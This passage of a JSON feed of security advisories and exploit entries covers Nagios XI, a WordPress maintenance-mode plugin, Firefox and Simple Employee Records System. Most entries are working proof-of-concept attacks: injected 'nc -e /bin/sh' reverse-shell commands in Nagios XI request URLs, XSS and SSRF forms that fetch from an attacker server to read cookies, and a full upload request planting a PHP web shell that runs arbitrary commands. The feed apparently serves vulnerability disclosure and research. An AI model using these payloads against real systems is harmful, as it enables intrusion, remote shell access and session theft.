4445;&port=161&snmpversion=2c&snmpopts%5Bsnmpcommunity%5D=public&snmpopts%5Bv3_security_level%5D=authPriv&snmpopts%5Bv3_username%5D=&snmpopts%5Bv3_auth_password%5D=&snmpopts%5Bv3_auth_proto%5D=MD5&snmpopts%5Bv3_priv_password%5D=&snmpopts%5Bv3_priv_proto%5D=DES&portnames=number&scaninterfaces=on&bulk_fields%5B%5D=ip_address&bulk_fields%5B%5D=&bulk_fields%5B%5D=&bulk_options=&bulk_fields%5B%5D=&bulk_fields%5B%5D=&warn_speed_in_percent=50&crit_speed_in_percent=80&warn_speed_out_percent=50&crit_speed_out_percent=80&default_port_speed=100&submitButton2= \n``` \n \nThe `ip_address` variable here is not sanitized and can give `command execution`. Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;` \n \n \n## CVE-2021-25298 \n \n### Code path \n \n`/usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php` \n \n### Code Snippet \n \n```php \ncase CONFIGWIZARD_MODE_GETSTAGE2HTML: \n \n// echo (\"reached here ============================\"); \n// Get variables that were passed to us \n$address = grab_array_var($inargs, \"ip_address\", \"\"); // [User input] \n$port = grab_array_var($inargs, \"port\", \"\"); \n$token = grab_array_var($inargs, \"token\", \"\"); \n$no_ssl_verify = grab_array_var($inargs, \"no_ssl_verify\", 1); \n$hostname = grab_array_var($inargs, 'hostname', gethostbyaddr($address)); \n$default_mem_units = grab_array_var($inargs, 'default_mem_units', 'Gi'); \n$tcp_check_port = grab_array_var($inargs, 'tcp_check_port', '5693'); \n$rp_address = nagiosccm_replace_user_macros($address); \n$rp_port = nagiosccm_replace_user_macros($port); \n$rp_token = nagiosccm_replace_user_macros($token); \n$services_serial = grab_array_var($inargs, \"services_serial\", \"\"); \nif ($services_serial) { \n$services = unserialize(base64_decode($services_serial)); \n} \n// echo $rp_address; \n$not_used = array(); \n$return_code = 0; \n$alternative_host_check = false; \nexec('ping -W 2 -c 1 ' . $rp_address, $not_used, $return_code); // [Bug here] \n``` \n \n### POC (Works with admin/non-admin authentication) \n \n``` \nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=e2401df06a3892ba612df20e1ce2f559d7647c4b5fcba7f64c23c0ea9df1564f&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=5693&token=123&submitButton2= \n``` \n \nThe `ip_address` variable here is not sanitized and can give `command execution`. Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;` \n \n \n## CVE-2021-25299 \n \n### Code Location \n \n`/usr/local/nagiosxi/html/admin/sshterm.php` \n \n### Code Snippet \n \n```php+HTML \n<?php if ($efe) { ?> \n<iframe src=\"<?php echo $url; ?>\" style=\"width: 50%; min-width: 600px; height: 500px;\"></iframe> \n<?php } else { ?> \n<div style=\"color: #FFF; font-size: 14px; font-family: consolas, courier-new; background-color: #000; padding: 2px 6px; overflow-y: scroll; width: 50%; min-width: 600px; height: 500px;\">Enterprise features must be enabled</div> \n<?php \n} \n``` \n \n### POC \n \n`https://10.0.2.15/nagiosxi/admin/sshterm.php?url=javascript:alert(1)` \n \nThe `url` variable is not sanitized and can give `xss` . \n \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161561/nagiosxi575-exec.txt"}, {"lastseen": "2021-02-26T16:43:36", "description": "", "published": "2021-02-26T00:00:00", "type": "packetstorm", "title": "WordPress Under Construction, Coming Soon, And Maintenance Mode 1.1.1 SSRF / XSS", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-02-26T00:00:00", "id": "PACKETSTORM:161576", "href": "https://packetstormsecurity.com/files/161576/WordPress-Under-Construction-Coming-Soon-And-Maintenance-Mode-1.1.1-SSRF-XSS.html", "sourceData": "`There are SSRF and RXSS vulnerabilities in the WordPress plugin Under Construction, Coming Soon & Maintenance Mode version 1.1.1. \nBoth vulnerabilities are fixed in version 1.1.2: \nhttps://wordpress.org/plugins/under-construction-maintenance-mode/#developers \n \n[1] SSRF \n \nHere is the relevant code from file includes/mc-get_lists.php: \n \n$apiKey = $_POST['apiKey']; \n$dataCenter = substr( $apiKey , strpos( $apiKey,'-' ) + 1 ); \n$url = 'https://'. $dataCenter. '.api.mailchimp.com/3.0/lists/'; \n \nThe user submits the POST parameter \"apiKey\", and the code constructs a https URL from it without any sanitization and then \nretrieves it with cURL, which leads to a SSRF bug. \n \nPOC: \n \n<form method=\"post\" action=\"http://attacked.server/wp-content/plugins/under-construction-maintenance-mode/includes/mc-get_lists.php\"> \n<input type=\"text\" name=\"apiKey\" value=\"-localhost:8765/test/test/test?key1=val1&dummy=\" /> \n<input type=\"submit\" value=\"Submit!\" /> \n</form> \n \n[2] RXSS \n \nThe code in the same file decodes JSON data fetched from the URL and then displays HTML code from the retrieved data without \nany HTML escaping, leading to a reflected cross-site scripting issue where the payload is on a different server. \n \nPOC (attacked.server runs WordPress with a vulnerable version of this plugin, and hacker.server is run by the attacker): \n \n<form method=\"post\" action=\"http://attacked.server/wp-admin/admin-ajax.php\"> \n<input type=\"hidden\" name=\"action\" value=\"ucmm_mc_api\" /> \n<input type=\"text\" name=\"apiKey\" value=\"-hacker.server/test.json?dummy=\" /> \n<input type=\"submit\" value=\"Submit!\" /> \n</form> \n \ntest.json: \n \n[[{\"id\":\"<script>alert(document.location);alert(document.cookie);<\\/script>\"}]] \n \n// Mr.F in 2021 \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161576/wpuccsmm111-xssssrf.txt"}], "ubuntu": [{"lastseen": "2021-02-27T03:58:11", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23979", "CVE-2021-23972", "CVE-2021-23971", "CVE-2021-23969", "CVE-2021-23974", "CVE-2021-23975", "CVE-2021-23978", "CVE-2021-23973", "CVE-2021-23970", "CVE-2021-23968"], "description": "Multiple security issues were discovered in Firefox. If a user were \ntricked into opening a specially crafted website, an attacker could \npotentially exploit these to cause a denial of service, obtain sensitive \ninformation, conduct cross-site scripting (XSS) attacks, bypass HTTP auth \nphishing warnings, or execute arbitrary code.", "edition": 1, "modified": "2021-02-26T00:00:00", "published": "2021-02-26T00:00:00", "id": "USN-4756-1", "href": "https://ubuntu.com/security/notices/USN-4756-1", "title": "Firefox vulnerabilities", "type": "ubuntu", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2021-02-26T10:29:26", "description": "", "published": "2021-02-26T00:00:00", "type": "exploitdb", "title": "Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated)", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-02-26T00:00:00", "id": "EDB-ID:49596", "href": "https://www.exploit-db.com/exploits/49596", "sourceData": "# Exploit Title: Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated)\r\n# Date: 2021-02-25\r\n# Exploit Author: sml@lacashita.com\r\n# Vendor Homepage: https://www.sourcecodester.com/php/11393/employee-records-system.html\r\n# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip\r\n# Version: v1.0\r\n# Tested on: Ubuntu 20.04.2\r\n\r\nuploadID.php can be used to upload .php files to \r\n'/uploads/employees_ids/' without authentication.\r\n\r\nPOC\r\n---\r\n\r\n1) Make the following Request changing the \"Host:\" to your Victim IP.\r\n\r\nPOST /dashboard/uploadID.php HTTP/1.1\r\nHost: 192.168.1.117\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 \r\nFirefox/78.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: multipart/form-data; \r\nboundary=---------------------------5825462663702204104870787337\r\nContent-Length: 267\r\nDNT: 1\r\nConnection: close\r\n\r\n-----------------------------5825462663702204104870787337\r\nContent-Disposition: form-data; name=\"employee_ID\"; filename=\"cmd2.php\"\r\nContent-Type: image/png\r\n<?php\r\n$cmd=$_GET['cmd'];\r\nsystem($cmd);\r\n?>\r\n-----------------------------5825462663702204104870787337--\r\n\r\n\r\n2) You will get the response with the name of the uploaded file \r\n(upload_filename).\r\n\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: Thu, 25 Feb 2021 19:17:55 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nContent-Length: 77\r\n{\"upload_filename\":\"Ag1rzKFWTlnCZhL_cmd2.php\",\"selected_filename\":\"cmd2.php\"}\r\n\r\n3) Your file will be located in: \r\nhttp://VICTIM_IP/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php\r\n\r\n4) In this example, to run commands:\r\nhttp://192.168.1.117/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php?cmd=whoami", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49596"}]}